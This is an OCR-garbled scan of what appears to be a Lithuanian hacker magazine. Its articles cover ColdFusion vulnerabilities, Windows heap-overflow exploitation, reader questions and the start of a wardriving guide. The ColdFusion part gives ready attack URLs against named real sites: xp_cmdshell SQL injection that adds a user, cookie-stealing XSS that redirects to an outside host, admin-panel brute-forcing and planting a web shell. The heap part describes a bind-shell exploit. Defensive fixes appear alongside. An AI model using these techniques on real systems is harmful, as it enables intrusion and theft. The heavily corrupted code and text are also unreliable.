Tai naudinga savybė, tačiau perlenkus lazdą gali Užvirti smege 


nys. Bet kokiu atveju, jeigu .cfm byloje tu nori panaudoti 
+0000ff“ tipo html spalvos konstantą, tai „4“ reikia ekranuoti 
(escape) ++0000ff, priešingu atveju užsiknisi kodamas 
klaidų. Daugelio mėgstamas trejopas (ternary) x==y ? „A lygu 


y „X nelygu y“ operatorius yra ir čia, tik CFML kalboje prieš 
Skliaustelį reikia parašyti IIF ir nepamiršti, jog bus įvykdytos abi 
išeitinės išraiškos. Yra vienas svarbus skirtumas, lyginant su 
PHP: neinicializuoto kintamojo iškviet sukelia klaidą. 

Štai dabar, kai tavo galvoje nuo visų aukščiau išsakytų teiginių 
susidarė darni ir aiški košė, galima pradėti aptarinėti paže 
mumus 


[Nr.1: są|-injection] Prieš pradedant aiškintis, kaip su Cold 
Fusion veikia sąl-injection, reikia pasakyti, jog darbui su DB 
naudojamas tagas <cfguery>, kurio viduje atviru tekstu įter 
piama S0L užklausa. Tarkim, užklausus puslapį Www.ser- 
ver.org?ltemID=5, įvykdomas šis kodas: 


datasourcė 


URL.llemlD 4 


Iguery name "gGailiemDetai|" 
ELECT * FROM Item WHERE ltemlD 


dguery 


Džiaukis, jeigu DBVS yra MSSOL Server: tu gavai praktiškai pa- 
ruoštą shellą, kadangi standartinė MSSOL procedūra 
xp cmdshell mielai išpildys bet kurį tavo kaprizą. Noriu pasaky- 
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ti, jog šiek tiek pakeitus URL į www.server.org/lte- 
mID=5;exec?620master..xp cmdshell?620'net62 Ouser?ė 
20petras3420password9620/add pasileis procedūra xp 
cmdshell ir bus pridėtas naujas vartotojas. Kaip kovoti su šia 
problema? Labai paprastai: reikia tikrinti ir ekranuoti (escape) 
visus įvedamus duomenis, vietoje SOL kodo fragmentų nau- 
doti savo stored procedūras („logikos perkėlimas į DB serverio 
pusę“ arba „lengvo kliento sukūrimas“), taip pat naudotis spe- 
cialiu tagu <cfgueryparam>, kuris užklausai siunčiamus duo- 
menis leidžia perduoti su aiškiai nurodytu jų tipu ir maksima- 
liu ilgiu. 


[Nr.2: tiesioginis šablonų iškvietimas] Nereikėtų sakyti, jog 
tai veiks tik su ColdFusion, bet vis dėlto. Principas paprastas: 
tiesiogiai iškviesti skripta, kuris paprastai pats savaime nėra 
Iškviečiamas, o turi kokį nors grynai tarnybinį tikslą; pavyzdžiui, 
programavime naudojama tokia praktika — duomenų bazės už- 
klausas iškelti į atskirą bylą — tai kodėl gi tuo nepasinaudojus? 
Čia susiduriama su dviem sunkumais: sužinoti reikiamos bylos 
pavadinimą ir sugebėti jį išnaudoti savo tikslais, juk niekas tau 
neleis taisyti kodo. Tokiu atveju paprasčiausias sprendimas yra 
išstudijuoti jau sukurtus projektus ir panaudoti surastas klai- 
das. Pavyzdžiui, dažnai ColdFusion projektuose naudojamas 
toks priedas, kaip FuseBox, kuris dėl gudraus bylų pavadini- 
mo, suskaidymo ir išdėstymo žymiai palengvina programos kū- 
rimo procesą (geras daiktas, realizuotas ir PHP). Išeities teks- 
tai prieinami visiems Ir laukia tavo analizės. Čia problema ta- 
me, kad išeities tekstai gali būti užkoduoti su tokiu įrankiu, 
kaip CFEncode — jis pateikiamas su standartiniu serveriu ir 
šifruoja su DES algoritmu. Vis dėlto „Informacijos kodavimo“ 
kursas dabar dėstomas net vidurinėje mokykloje, todėl žemiau 
pateikiama nuoroda į CFDecode programos išeities tekstus. 
Kaip kovoti su šia klaida? Užklausų ir kitas svarbias bylas reko- 
menduojama išsaugoti į su naršykle neprieinamą katalogą. Be 
to, į specialų šablona application.cfm, kuris iškviečiamas krei- 
Piantis į bet kokią bylą, galima įterpti užklausiamos bylos kelio 
patikrinimą. 


ĮNr.3: absoliutaus kelio gavimas] Manoma, kad tokio admi- 
nistratoriaus neapsižiūrėjimo kritiškumo lygis pakankamai žemas, 
tačiau hakeriui tokia informacija labai pravers. Jeigu IIS serverio 
užklaustum bylos, kurios pavadinimas sudarytas iš MS-DOS įren- 
ginio pavadinimo (NUL, PRN ir kt.) ir .dbm išplėtimo, tai IIS pa- 
teiks klaidą, nurodydamas absoliutų kelią iki ieškomos bylos, ku- 
ri turėtų būti išsaugota web root kataloge. Pavyzdžiui, kreipimasis 
adresu http://national.united-way.org/nul.dbm gražins puslapį su 
Klaida (jis pateiktas nuotraukoje kairėje). Patirtis rodo, jog dažnai 
T ara ia a —— 


SLI me a 
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Evro Oxcurte Wiile Procerdag Rust 


Absoliutus kelias Iki web katalogo pravers bet Kuriam hakeriui 


blogai sukonfigūruotas serveris elgiasi maždaug taip pat užklau- 
siant bet kokio neegzistuojančio puslapio, tačiau šis būdas iš- 
naudoja web serverio konfigūracijos specifiką. 

Kaip su tuo kovoti? IIS nustatymuose „cfm ir .dbm išplėtimams 
uždėti varnelę „Bylos egzistavimo patikrinimas“. 

Yra ir dar vienas kelio gavimo variantas, tačiau jis veikia tik 4.0x 
versijos serveriuose, kurie pastaruoju metu nėra labai populia- 
rūs — serveris kešuoja iškviečiamus puslapius, o visą kešuoja- 
mą informaciją išsaugo byloje cfcache.map, kuri saugoma ta- 
me pačiame kataloge, kaip ir iškviečiama byla: ten saugomi 
iškviečiamų kešo bylų pavadinimai serverio failų sistemos su- 
pratimu. Pavyzdžio dėlei google'ėje įvesk tokią užklausą: 
inurl:cfcache.map, atidaryk bet kurią nuorodą ir tu pamatysi 
kažką panašaus į: 


fie.dm 
Mapping = c/ctusion/bin/diagsACFC197.1mp 
SourcaTimeStamp = 05/18/1999 06:17:00 PM 


[Nr.4: priėjimas prie derinimo informacijos] Tai nera labai 
baisus pažeidžiamumas, tačiau apie jį reikia žinoti. Apskritai 
dėl ColdFusion Administrator nustatymų arba po specialaus ta- 
g0 .cfm bylos pabaigoje paleidimo gali būti pateikiama derini- 
mo (debug) informacija, kuri labai reikalinga programos kūrimo 
metu: skripto darbo laikas, GET ir POST kintamieji bei CGI kinta- 
mieji (kažkas panašaus į aplinkos kintamuosius (žr. paveiksliu- 
ką dešinėje puslapio pusėje)). Ką iš to galima gauti: absoliutų 
Kelią iki iškviestos bylos web serverio failų sistemoje, taip pat 
paties web serverio vardą ir versiją (dažniausiai tai IIS, kas ne- 
tiesiogiai išduoda naudojamos operacinės sistemos tipą). No- 
rėdamas pamatyti tokį stebuklingą reiškinį, pabandyk adrese 
įrašyti parametrą mode su reikšme debug, pavyzdžiui, taip: 
www.phillipsnizer.com/library/cases/lib case368.cfm?mo- 
de=debug. Kovoti su šiuo pažeidžiamumu labai paprasta: Cold- 
Fusion Administrator'iaus derinimo (debug) nustatymuose rei- 
kia įvesti IP adresą, pavyzdžiui, 127.0.0.1. 
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ĮNr.5: ColdFusion Administrator] Įdomus pažeidžiamumas, bū- 
dingas tik ColdFusion. Kaip jau buvo paminėta, serveris konfigū- 
ruojamas su specialiu web įrankiu. Pradinės konfigūracijos (setup) 
metu ColdFusion administratorius ten įeina šiuo adresu: http:// 
127.0.0.1/CFIDE/administrator/index.cfm.. Administratoriai prie 
ColdFusion Administrator turėtų leisti prieiti tik iš 127.0.0.1 adre- 
so, tačiau pakankamai dažnai tai padaryti jie pamiršta. Taigi tavo 
užduotis yra surasti ColdFusion serverį ir patikrinti štai tokį adresą: 
http://server.com/CFIDE/administrator/index.cfm (kartais tenka žaisti 
kaitaliojant katalogų pavadinimų didžiąsias/mažąsias raides, ka- 
dangi ne visi naudoja langines). Čia privalumas tame, Jog tau rei- 
kalingas tik slaptažodis — vartotojų vardai čia nėra numatyti, todėl 
galima sėkmingai brutforsinti. Pats slaptažodis įvedamas serverio 
įdiegimo metu (žr. žemiau esančią nuotrauką). 


[ColdFusion FuseBox V4.1.0 klaidos] 

FuseBox — tai standartinė ColdFusion web sistemų kūri- 
mo technologija, kuri priklausomai nuo valdančio paramet- 
ro reiškia nuoseklų tam tikrų bylų prijungimą ir įvykdymą. 
Vaizdžiai šnekant, tai būtų kažkas panašaus į: 


< dhswitch expression = "žfuseciion £" > 
<dase valu= "adl"> 
< dindludo template= "login header.dm“ > 


<chindude tenplate= “login footardin“> 
</ckase> 

<chase value="ad2'> 

< dindude template= "gueryresul. d" > 
</ckase> 

</dswith> 


Norint gauti įspūdingą FuseBox naudojančių svetainių są- 
rašą, pakanka gūglei sušerti šią užklausą: inurl:.cfim?fuse- 
action. 

Praėjusios vasaros pabaigoje bugtrag forumuose pasirodė 
pranešimai apie FuseBox klaidą. Su elementaria užklausa 
buvo galima nugvelbti vartotojiškus sausainukus ir kliento 
pusėje įvykdyti laisvai pasirinktą kodą: 


wyvsite. comVindex.chm?fuseadion =" > <stript >document.location="http:// 
ww.halerislt“ </scipi> 


Su elementaria užklausa galima prieiti prie derinimo infor- 
macijos: 


wwwwsite con/indau.chmPuszaciion =? 


Laimė, pažeidžiamos ne visos FuseBox V4.1.0 naudojan- 
čios svetainės — kai kuriuose projektuose gali būti nurody- 
tas nuosavas puslapis su klaidos pranešimu, kai kur bus 
vykdomos ne visos JS konstrukcijos. Pavyzdžiui, įmanomas 
toks variantas, kuomet veiks visos užklausos, išskyrus tas, 
kurios kreipiasi į vartotojiškus kukius. 

Jeigu tu susidūrei su tokiu resursu, gali išmėginti dar vieną 
užklausą: 


www. site.com/index.cfm?fuseaction= fusebox.overview" > <script>aleri(datu- 
ment.cookie) < /scipt> < 


Greitas google užklausos filetype:cfm rezultatų patikrinimas 
pateikė porą svetainių, kurias tvarko atlėpausiai administrato- 
riai — tai Niujorko viešasis puslapis (www.nypl.org) ir kažkokio 
žmogelio asmeninė svetainė (www.petefreitag.com). 

Kaip su tuo kovoti: ColdFusion Administrator nustatymuose at- 
jungti priėjimą iš nelokalių adresų ir pasirinkti UKO*8fTNDn ti- 
po slaptažodį. 


[Ką tai duos] Čia mūsų mielas skaitytojas gali paklausti, tai ką, 
atseit, aš galiu padaryti serverį, jeigu gaunu priėjimą prie Cold- 
Fusion Administrator? O pasirodo, jog štai čia prasideda sal- 
džiausia dalis: visų pirma, jeigu serveryje veikia IIS, tai su spe- 
cialių Java apletu, kuris yra skyrelyje Server -> Server Settings- 
> Settings, tu gali landžioti po serverio failų sistemos medį, po 
to Error Template nuorodą nukreipti į savo nutolusį skriptą ir 
tada serveryje iškviesti neegzistuojantį puslapį, kad būtų paleis- 
tas taviškis piktybinis skriptas; antra, yra universalesnis prasi- 
sukimo būdas — tereikia gudriai į serverį įkelti savo skripta, ty. 
faktiškai taip sukurti sau web shellą. Tam eik į skyrelį Server -> 
Automated Tasks —> Schedule Task ir čia nuspausk mygtuką 
Add Scheduled Task. Atsidariusiame puslapyje įvesk užduoties 
pavadinimą, kuris geriau tegu būna nekrentantis adminui į akį 
(jeigu taip iš viso būna; žvilgtelėk į tai iliustruojantį paveikslėlį). 
Patikrink, kad lauko Operation reikšmė būtų HTTPReguest. Po 
to URL lauke įvesk nuorodą į savo skriptą, po ko lauke Publish 
pažymėk mums ypač svarbią varnelę Save output to a file. Vė- 
liau nurodyk serveryje išsaugoto bylos-rezultato kelią ir pavadi- 
nimą — kelią galima sužinoti vienu iš aukščiau aprašytų būdų. 
Jeigu nepavyko, tai kitame naršyklės lange užklausk serverio 
neegzistuojančios bylos, o ColdFusion Administrator'iuje eik į 
skyrelį Tools -> Logs and Statistics -> Log Files, užeik į web- 
server.log ir pažiūrėk, kur serveris ieškojo atsakymo į tavo gudrią 
užklausą. Po visų šių konvulsijų drąsiai spausk mygtuką „Sub- 
mit Changes“, o pasirodžiusiame puslapyje spausk paveikslėlį 
Go, kuris yra šalia tavo užduoties (ji yra paskutiniame stulpelyje 
Controls). Jeigu viskas suveikė, tai serveryje bus sukurta byla su 
nurodyto puslapio tekstu, kurioje, savame suprantama, bus sau- 
gomas paprasčiausio CFML web shello kodas ir dabar šią bylą 
galima drąsiai iškviesti per naršyklės adreso eilutę. 
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Didelė krūvelė 

PASIRAUSUS IN TERNETE GALIMA RASTI 
GAUSYBĘ MEDŽIAGOS, KURIOJE APRASO- 
MI PATYS ĮVAIRIAUSI PERPILDYMO METO- 
DAI. PERPILDYMAI STEKE, BUFFER OVER- 
FLOW, FORMAT STRING — VISA TAI IŠSA- 
MIAI APRASYTA DAUGELYJE INTERNETO 
SVETAINIŲ. TAČIAU GERIAU ĮSIŽIŪRĖJŲS GA- 
LIMA PASTEBĖTI, JOG VISI PAVYZDZIAI IR 
POPULIARIŲ METODIKŲ APRAŠYMAI PATEI- 
KIAMI *NIX SISTEMOMS. LĮSTI | WINDOWS 
SISTEMAI SPECIFI NIŲ NIUANSŲ KRŪVELĘ 
NIEKAS NENORI. BŪTENT DĖL ŠIOS PRIE- 
ZASTIES MES NUSPRENDĖME TAU PA- 
RUOSTI ĮDOMŲ STRAIPSNĮ APIE TARP HA- 
KERIŲ IR VIRUSŲ KŪRĖJŲ POPULIARŲ ME- 
TODĄ, KURĮ PANAUDOJANT PLINTA BENT 
PUSĖ TINKLO KIRMINŲ — APIE HEAP 
OVERFLOW. 


„Heap“ perpildymo 

„Windows“ sistemoje pagrindai 

[Kas gi tas „heap“?] Visų pirma išsiaiškinkime, kas gi 
tas heap. Bet kuris mokinukas tau pasakys, kad išvertus 
Iš anglų kalbos šis žodis reiškia „krūvą“. O mūsų kompiu- 
terių specialistų kontekste žodis „heap“ reiškia specialią 
rezervuotos adresų erdvės sritį, kurioje atminties išskyri- 
mas ir atlaisvinimas vyksta su specialiomis sisteminėmis 
funkcijomis. Dirbdami su šia sritimi programuotojai gali 
prieiti prie milžiniškos nuosavos virtualios adresų erdvės, 
kurios talpa žymiai viršija realios kompiuteryje įdiegtos 
fizinės atminties apimtį. Visos pagrindinės darbo su he- 
ap funkcijos (išskyrimas, atlaisvinimas ir atminties blokų 
sukūrimas) yra sisteminėje bibliotekoje ntdll.dll. Iš pra- 
džių kiekvienai programai Windows sistemoje išskiriama 
vieno megabaito krūvelė, o vėliau, iškilus poreikiui, išski- 
riamos atminties kiekis yra automatiškai didinamas. Pro- 
grama savo ruožtu su specialiomis funkcijomis gali su- 
kurti nuosavą adresų erdvę. Atmintis krūvelėje išskiriama 
sritimis, kiekvienoje srityje galima sukurti atminties blo- 
kus, kurie bus įkurdinti segmentuose. Kiekvieno tokio blo- 
ko valdyrmui sukuriama nuosava speciali antraštė, kuri 
pavaizduota 1 paveikslėlyje. 

Čia Size žymi bloko dydį, Previous Size — ankstesnio 
bloko dydį, Segment Index — segmento indeksą, kuria- 
me yra blokas, Unused — nenaudojamų bloko baitų 
kiekis, Tag Index — žymės indeksas, o Flags — bloko 
vėliavėlės. Vėliavėlės gali būti tokios: 


Ox01 — HEAP ENTRY BUSY 

0x02 — HEAP.ENTRY EXTRA PRESENT 
0x04 — HEAP-ENTRY FILL PATTERN 
0x08 — HEAP ENTRY VIRTUAL ALLOC 
0x10 — HEAP ENTRY LAST ENTRY 
0x20 — HEAP ENTRY SETTABLE FLAG1 
0x40 HEAP ENTRY SETTABLE FLAG2 
0x80 HEAP ENTRY SETTABLE FLAG3 


Atlaisvinus atminties bloką, jis pasidaro toks, kaip pavaizduota 
2 paveikslėlyje. Čia Flink — rodyklė į ktąi atlaisvintą bloką, o 
Blink — rodyklė į ankstesnį atlaisvintą bloką. 


[Kitas žymėjimas] Norint supaprastinti laisvų blokų valdy- 
mą, taip pat naudojamas išskirtų vienetų kiekio žymėjimas. 
Šiuos vienetus galima apskaičiuoti taip. Kiekvieno išskiria- 
mo atminties bloko apimtis lygi 8. Pavyzdžiui, jeigu programa 
išskiria 64 baitų dydžio bloką, tuomet gauname 64/8 = 8 


Previous Size 


Unused Tag Index 


Paveikslėlis 1; bloko antraštė 


Previous Size 


Tag Index 


Paveikslėlis 2: laisvo bloko antraštė 


adresavimo vienetus. Kiekviena krūvelė prasideda nuo 128 
(pagal nutylėjimą išskiriama 1Mb = 128 * 8) LIST ENTRY 
masyvų struktūros, kurią galima rasti winnt.h/win.h byloje. | 
kiekvieną masyvo Indeksą įrašomas laisvas blokas, sunume- 
ruotas pagal išskyrimo vienetus. Mūsų pavyzdyje mes išsky- 
rėme 64 baitų dydžio bloką, tokiu atveju gauname 8 išskyri- 
mo vienetus. Taigi atlaisvinus atminties bloką į FreeList ma- 
syvą (laisvų blokų masyvas) 8 indeksu bus įrašytas mūsų at- 
laisvintas blokas. Atmink, jog pirmasis FreeList indeksas ne- 
naudojamas dėl to, kad 8 baitų blokas negali egzistuoti. In- 
deksų numeravimas prasideda nuo 2-jų, nulinis Indeksas 
naudojamas atlaisvintiems didesniems nei 1016 baitų dy- 
džio atminties blokams saugoti. 


[Darbo su „heap“ funkcijos] Dabar pakalbėkime apie darbo 
su krūvele funkcijas. Aš aprašysiu pagrindinius sisteminius iš- 
kvietimus: 

1. Pirmoji funkcija vadinasi HeapCreatel). Ji skirta privačios at- 
minties sričiai sukurti. Jai perduodami trys parametrai. Aptarki- 
me juos: 

— Krūvelės vėliavėlė, viso jų dvi. Pirmoji vėliavėlė — HEAP GE- 
NERATE EXCEPTIONS — parodo tai, jog klaidų atveju bus su- 
generuota išimtinų situacijų struktūra (SEH). Antroji vėliavėlė — 
HEAP NO SERIALIZE — parodo tai, kad bus atšauktas sinchro- 
nizuotas priėjimas prie atminties. Šią opciją vertėtų naudoti tik 
tuo atveju, jeigu tu tikras, kad vienu metu prie krūvelės negali 
prieiti du srautai. 

— Krūvelės dydis. 

Maksimalaus krūvelės dydžio reikšmė. Jeigu čia įrašysi O, 
tuomet heap dydį ribos maksimali visos sistemos virtualios at- 
minties reikšmė (4 Gb, neskaitant paprastų žmonių nenaudo- 
jamų Windows 2000 Advanced Server ir kitų dar rimtesnių šios 
sistemos versijų). 

Funkcija vietoje darbo rezultato grąžina deskriptorių, per kurį 
vėliau bus išskiriama atmintis. Kad tau būtų lengviau visa tai 
suprasti, remdamasis pavyzdžiu parodysiu, kaip atrodo šios funk- 
cijos iškvietimas: 

HANDLE Heap1 = HeapCreate(HEAP GENERATE EXCEPTIONS, 
700, O); 
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Paveikslėlis 4: serveris komoje 


2. Antroji funkcija, kuri vadi- 
nasi HeapAlloc(), naudojama 
blokams išskirti. Jai perduo- 
dami trys parametrai: 
— Krūvelės srities deskripto- 
rius (mūsų atveju tai Heap1). 
Nebūtinos vėliavėlės, dvi 
iš kurių analogiškos panaudo- 
jamoms HeapCreatei() funk- 


Aprašyta ivotodka priklauso 
Nuo sistemos, todėl kieki 
rai OS versijai 


mos bylos PE antraštėje Iis 
gali būti pakeistas. 


MI / šis straipsnis patekiamas | Cijoje, O trečioji vėliavėlė — 
yinėjimo tikslais, siekiant | HEAP ZERO MEMORY — pa- 
Apeninų avanėie" rodo tai, jog išskirtas blokas 
Jo kirminų rsm: juk ž 
stabai užkrato plitimą gali užpildomas nuliais. 

7 Ma t padori šsiaskius. | — Reikalaujamos atminties 

1 V. šaipis pima. Už neteisėtą 


dydis. Iškvietimo pavyzdys: 


gautų žinių panaudojimą at 
Sakalik tu pats. 


hr "HecpBlodk!  Keaplloc(Heno! 


HEAP ZERO MEMORY, 555), 


3. Trečioji funkcija HeapFree() skirta blokui atlaisvinti. Jai taip 
pat perduodami trys parametrai: 

— Srities deskriptorius. 

— Vėliavėlė. Gali būti O arba HEAP NO SERIALIZE. 

— Blokas, kurį reikia atlaisvinti. 


Aš tau papasakojau apie pagrindines Windows sistemoje nau- 
dojamas darbo su heap funkcijas. Supratimas apie jų veikimą 
mums labai greitai pravers, kadangi mes pereiname prie paties 
įdomiausio — prie paties Heap Overfiow. 


[Krūvelės perpildymas] Krūvelės perpildymas panašus į 
steko perpildymą. Kaip ir reikėtų tikėtis, šiuo atveju išskirti- 
nis bruožas yra tas, jog mes susiduriame su krūvelė, 0 ne 
su steku :). Kad nereikėtų šnekėti abstrakčiai, pateiksiu pla- 
čiai sutinkamą pažeidžiamos programos kodo pavyzdį. Įsi- 
žiūrėk į jį: 


Pažeidžiamos programos kodas 
"indude < sidio.h> 

Aindude < windovs.h:> 

int main (int argę, char "argyl] ) 


( 

HANDLE Heapl  HeapCioatel0, 700, 0); 

char“ hblock! = HeapAlloc(Haapl, HEAP ZERO MEMORY, 10); 
strepy(hblock1, argyl1]); 

char“ hblock2 — HeapAlloc(Heapl, HEAP ZERD MEMORY, 20), 
Heapfrea(Heap1, O, hhlock!); 

HeapFree(Heap1, O, hblock2); 

return O; )- 


Jeigu tu esi atidus ir šiek tiek išmanai apie programavimą, 
tuojau pat pastebėsi, kad šioje programoje yra pažeidžiamu- 
mas — perpildymas naudojant funkciją stropy(). Kopijavimo 
metu mes neįvertiname perduodamo parametro ilgio, kuris 
kopijuojamas į pirmąjį bloką. Įvedus pakankamai Ilgą eilutę, 
duomenys perpildys pirmąjį bloką, po ko mes pakliūname jau 
į antrojo bloko valdas, kur turėsime galimybę jį valdyti. Tai vaiz- 
džiai matyti su bet kuriuo derinimo įrankiu (debugger), 0 aš 
naudosiu įžymųjį OllyDbg. 
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Žvilgtelėk į trečiąją nuotrauką. Ten aiškiai matyti, kas vyksta per 
pildant krūvelę. Heap Overfiow įvyko atlaisvinant atminties blo: 
kus, ir dabar mes valdome du registrus 
dėmesį į šį derintuve matomą kodo fragmentą: 


(OV DWORD PTR DS:[EO(], EA) 
V DWORD PTR DS:[EAX 


Šios eilutės ir reiškia tai, jog mūsų valioje yra aukščiau paminėti 
registrai. Jeigu tu supratai visą krūvelės darbo techniką, tuomet jau 
gali numanyti, jog normalaus veikimo atveju į EAX registrą bus įra- 
šytas kito iš eilės laisvo bloko adresas, o į ECX 
adresas. Perpildymo metu mes perrašėme šių registrų reikšmes, 
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Blink. Šiame straipsnyje aš noriu papasakoti apie vieną lengviau- 
sių technikų apie neapdorojamų išimčių filtro (Unhandled Ex- 
ception Filter) perrašymą. Šį filtrą konfigūruojanti funkcija yra sis- 
minėje bibliotekoje kernel32.dll ir vadinasi SetUnhandledExcep- 
ionFilter. Jos kodas atrodo maždaug taip: 


nov dword pir [77ED7384] 


0004 


Norint įvykdyti kodą, mums pakanka į ECX registra įrašyti filtro 
adresą (77ED73B4), o EAX registrą adresa, kuris valdymą 
perduoda shellkodui 

Tuo pačiu po to bus įvykdytas šis kodas: 


il. OuerylnformationPro 
mov eax, divord pr [77ED7" 


Čia matosi, jog valdymas bus perduotas šiam filtrui, o pa- 
keitus filtrą mes galėsime valdymą perduoti mūsų shellko- 


TTETEHEIEHIILIIALSSI 


Paveikslėlis 5: sėkmingai veikiantis eksplotas 


— EAX ir ECX. Atkreipk 


ankstesnio bloko 


dėl ko įvyksta klaida. Eksploatavimas įmanomas pakeičiant Flink ir 


Paveikslėlis 6: prisikabinimas prie proce: 


dui. Atidaus skaitytojo galvoje jau tikriausiai subrendo klau: 
simas, kaip galima sužinoti shellkodo adresą. Čia viskas 
paprasta. Esmė tame, kad EDI+0x74 registras rodo į steką 
prieš krūvelę (heap). Taip perrašę perėjimo į filtrą adresą 
mes valdymą perduodame į iš anksto paruoštą shellkodą. 
Pabandykime visa tai aptarti pasiremdami praktika. Vietoje ban- 
domojo triušio aš parašiau mažą serverinę programą, kuri pri 
ima klientų užklausas. Pasiuntus išskirto buferio dydį viršijan- 
čią užklausą, serveris atsijungia su perpildymo klaida. Klien 
to-eksploito užduotis pasiusti specialiu būdu suformuotą 
užklausą, kuri perpildys krūvelę, iškvies neapdorojamą išimčių 
filtrą, jį pakeis ir perduos valdymą shellkodui, kuris savo ruo: 
tu per 28876 jungtį atidarys shellą. Štai ir viskas. Norint ge- 
riau suprasti visas mano šnekas, primygtinai tau siūlau iš mū- 
sų disko pasiimti serverio išeities tekstą ir kartu su manimi 
sekti visus veiksmus, kuriuos serveris atlieka derintuve. | Ol 
lyDbg užkrauk Semverexe ir perduok programai pakankamai i 
gą eilutę. Derintuve tu pamatysi vaizdelį, kuris labai panašus 
pavaizduotą 4 paveikslėlyje. 

Kaip matosi paveikslėlyje, serveris nulūžo, o EAX bei ECX 
reikšmės buvo pakeistos į 0x61616161. Tai įrodo, jog mes 
pajėgūs sėkmingai įvykdyti kodą. Pats eksploitas, kuris su- 
teiks priėjimą prie shello, labai paprastas, tu jį taip pat gali 
rasti mūsų diske. Jame aš susijungimui su serveriu naudoju 
winsock (pas jus jis veikia per 6666 jungtį). Prie jo prisijun 
gus eksploitas formuoja perpildymui skirtą eilutę. Tam mes 
užpildome programoje išskirtą buferį, taip suorganizuodami 
trumpą peršokimą įmps, kuris valdymą perduoda filtrui, o po 
to perrašomas su instrukcija call dword ptr Jedi+0x74]. Mū- 
sų atveju ši instrukcija paimta iš bibliotekos rpert4.all. Val 
dymas pereina į nop'us, kurie nusileidžia iki serverio pusėje 
įvykdomo mūsų shellkodo. Shellkodas veikia štai taip. Iš pra: 
džių mes su winsock struktūra mašinoje atidarome 28876 
jungtį. Toliau su CreateProccess() sukuriame cmd.exe proce 
są, kuris „pakabinamas“ ant aukščiau nurodytos jungties, to: 
dėl prie jo prisijungęs tu gauni interaktyvią komandinę eilutę. 
Kad būtų lengviau suprasti eksploito veikimą, siūlau tau iš 
pradžių paleisti serverį be derinimo priemonių, o po to su 


OllyDbg prie jo prisikabinti. Visus šiuos veiksmus galima pa- 
matyti 5 paveikslėlyje. 

Kaip matyti, visi mūsų teoriniai pamąstymai ir apskaičiavimai 
buvo įgyvendinti praktiškai: mes perrašėme filtrą, mūsų kodas 
buvo sėkmingai įvykdytas, o per 28786 jungtį buvo atidaryti pri- 


ėjimo prie cmd.exe vartai :). 

Vasarį kažkas nutiko su mano Miranda. Da- 
[Pabaiga] Šiame straipsnyje aš tik pateikiau tolimesnių stu- bar pranešimai iki vienų adresatų nueina 
dijų pagrindą. Mano aptarta technika laikoma pačia leng- sklandžiai, o iki kitų — niekaip. Perknisau 
viausia, o tikimybė, kad teisingai sukompiliavus eksploitą visus nustatymus ir išbandžiau viską, tačiau nie- 
kodas bus įvykdytas, labai didelė. Vis dėlto ši metodika turi kas nepadeda. O smagiausia tai, kad įdiegus ki- 
rimtą trūkumą: ji priklausoma nuo platformos. Tai reiškia, tą klientą — gip'ą — niekas nepasikeitė. Kame 
kad kiekvienai operacinei sistemai ir atskiram pataisymų problema? 
paketui (service pack) reikia ieškoti nuosavų adresų filtrų. 
Kituose straipsniuose aš greičiausiai aptarsiu kitas techni- Su panašiomis problemomis teko susidurti ir 
kas, kurios nepriklauso nuo platformos ir kuriomis remian- mums patiems. Pasirodo, AOL vaikinai susigal- 
tis galima rašyti universalius eksploitus. vojo pakoreguoti egzistuojanti protokolą, todėl 


daugelis alternatwių klientų tam tikram laikui ||- 
ko už borto. Beje, greitai pateikti atnaujinimai viską 
sutvarko. Taigi atnaujink klientą ir viskas bus gerai. 


Nesuprantu, iš kur tiek triukšmo dėl Fire- 
Fox. Kas šioje naršyklėje tokio ypatingo? Ma- 
no nuomone, Opera ją lenkia mažiausiai 
dviem žingsniais! 


Visa esmė slypi plečiamume, tiksliau — apgal- 
votoje praplėtimų sistemoje. Su trečiųjų šalių 
gamintojų įskiepiais FireFox galima paversti tik- 
ra žudymo mašina, kuri gali absoliučiai viską. Kad 
nesisvaidyčiau tuščiais žodžiais, pateikiu mano pa- 
- 4 = ties naudojamų praplėtimų sąrašą: 
E AdBlock Plus (http://bene.sitesled.com/ad- 
2 Šo block.htm) — puikus antireklaminis įrankis, taip pat 
pribaigiantis ir Flash reklamines antraštes (bane- 

—— rius), apie kuriuos aš jau seniai pamiršau... 
FlashGot (http:/flashgot.net) šis įskiepis supo- 
ruoja FireFox su išorine siuntimo programa, mano 
atveju tai Download Master. Apeina visas web pro: 
gramuotojų gudrybes ir be priekaištų perima net ir 
egzotiškiausius siuntimus. 
ImgLikeOpera (http://imglikeopera.mozdev.org) — SU 
šiuo įskiepiu galima greitai ijungti/išjungti vaizdų Už- 
krovimą. 
ScrapBook (http:/'amb.vis.ne.jp/mozilla/scrapbook) 
— stebuklingas praplėtimas, leidžiantis į reikiamą 
katalogą greitai išsaugoti peržiūrimą puslapį arba 
jo dalį. Galų gale kietajame diske nebus išsaugotų 
dokumentų sąvartyno. 
SwitchProxy Tool (htip://mozmonkey.com) — man 
pakankamai dažnai tenka keisti proxy serverius, to: 
dėl šis įskiepis ypač praverčia. 

| Tabbrowser Extensions (http://piro.sakura.ne.jp/xul| 
= tabextensions) — žymiai patobulina skyrelių (tabs) 
4 sistemą, kuri suteikia daugybę naujų galimybių. La- 
E | bai patogus daikčiukas. 


s2005+»04 [Paw i 
dll bibliotekoje aprašytas SetUnhandledExcoptionFilter 


ai 
tm] a2902+>6005 B= 1414 
Paveikslėlis 3: krūvelėje įvykęs perpildymas. 
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XXI amžiaus oro asai 
BELAIDĖS TECHNOLOGIJOS JAU SENIAI NE- 
RA EGZOTIKA, TIK ISRINKTIES EMS PRIEI- 
NAMU DALYKU. KIEKVIENAS SIUOLAIKINIS 
NESIOJAMASIS KOMPIUTERIS KOMPLEK- 
TUOJAMAS SU W/-FI PLOKŠTE, O UŽ 50 
DOLERIŲ GALIMA NESUNKIAI ĮSIGYTI PRI- 
EJIMO TASKĄ (AP). BELAIDZIAI TINKLAI AP- 
GOBIA VIENĄ MIESTĄ PO KITO, TODĖL VIS 
LABIAU POPULIARĖJA TOKIA PRAMOGA, 
KAIP WARDRIVINGAS. TU TURI NESIOJAMĄJĮ 
KOMPIUTERĮ IR DEGI NORU TAPTI ORO KA- 
RALIUMI? PUIKU, TIK AR TAVO SISTEMA PA- 
SIRUOSUSI TAPTI PILNAVERČIU IR DAUGIA- 
FUNKCINIU ĮRANKIU PATYRUSIO WARBDRI- 
VERIO RANKOSE? JEIGU NE — NIEKO BAL- 
SAUS, STAI TAU MŪSŲ PATARIMAI. 


Wardriverio-uniksoido arsenalas 

[Visų rūšių belaidės plokštės] 

Jeigu tu turi nešiojamąjį kompiuterį, kuriame įdiegta Intel Cen 
